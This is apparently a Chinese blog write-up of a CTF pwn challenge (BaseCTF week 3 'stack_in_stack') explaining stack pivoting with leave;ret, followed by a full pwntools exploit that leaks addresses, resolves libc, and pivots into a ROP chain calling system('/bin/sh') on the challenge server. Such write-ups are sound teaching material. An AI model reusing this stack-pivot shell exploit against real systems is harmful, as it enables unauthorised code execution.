栈迁移
原理
栈迁移主要利用了leave_ret这个指令
leave | 返回上级函数时,恢复原本的栈空间 | leave | mov esp,ebp pop ebp |
---|---|---|---|
ret | 返回上级函数后,执行上级函数的命令 | ret | 等同于 pop eip (不存在这样的指令 |
esp
'''
ebp
ret
在函数的先执行到leave指令时,会将ebp处填充的地址pop到ebp中去,这样栈基地址发生了变化,在下次的栈位置就会发生变化
有个图对这些指令变化阐述的比较清楚
来自栈迁移的原理&&实战运用 - ZikH26 - 博客园 (cnblogs.com)
例题
basectf week3 stack_in_stack
想要赛后要附件的师傅可以加我
通过这里的动态调式才发现溢出了0x10个字节,故通过栈迁移来进行
第一个read
payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00')
payload+=p64(leak-0X8)+p64(leave_ret)
p.send(payload)
统一解释一下这个leave_ret
下面的步骤大概是这样的
exp
from pwn import *
from LibcSearcher import *
#p = process('./pwn')
p=remote('challenge.basectf.fun',32210)
context(log_level='debug')
elf = ELF('./pwn')
#libc=ELF('./libc.so.6')
#libc=elf.libc
#gdb.attach(p)
#pause()
main=0x4010e0
gift=0x4011c6
leave_ret=0x4012f2
p.recvuntil('mick0960.\n')
leak=int(p.recv(14),16)
print(hex(leak))
payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00')
payload+=p64(leak-0X8)+p64(leave_ret)
p.send(payload)
p.recvuntil(b'You found the secret!\n')
p.recvuntil(b'0x')
puts=int(p.recv(12),16)
print(hex(puts))
p.recvuntil(b'mick0960.\n')
leak2 = int(p.recv(14), 16)
libc=LibcSearcher("puts",puts)
'''
libc_base=puts - elf.symbols['puts']
print(hex(libc_base))
read=libc_base+elf.symbols['read']
print(hex(read))
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
system_addr=libc_base+libc.sym['system']
'''
libc_base=puts-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')
pop_rdi=libc_base+0x2a3e5
payload1=(p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)).ljust(0x30,b'a')
payload1+=p64(leak2-0x8)+p64(leave_ret)
#p.recvuntil(b'mick0960.\n')
p.send(payload1)
p.interactive()
标签:p64,puts,libc,ret,leave,详解,base,迁移
From: https://blog.csdn.net/yufeiyu66/article/details/142069531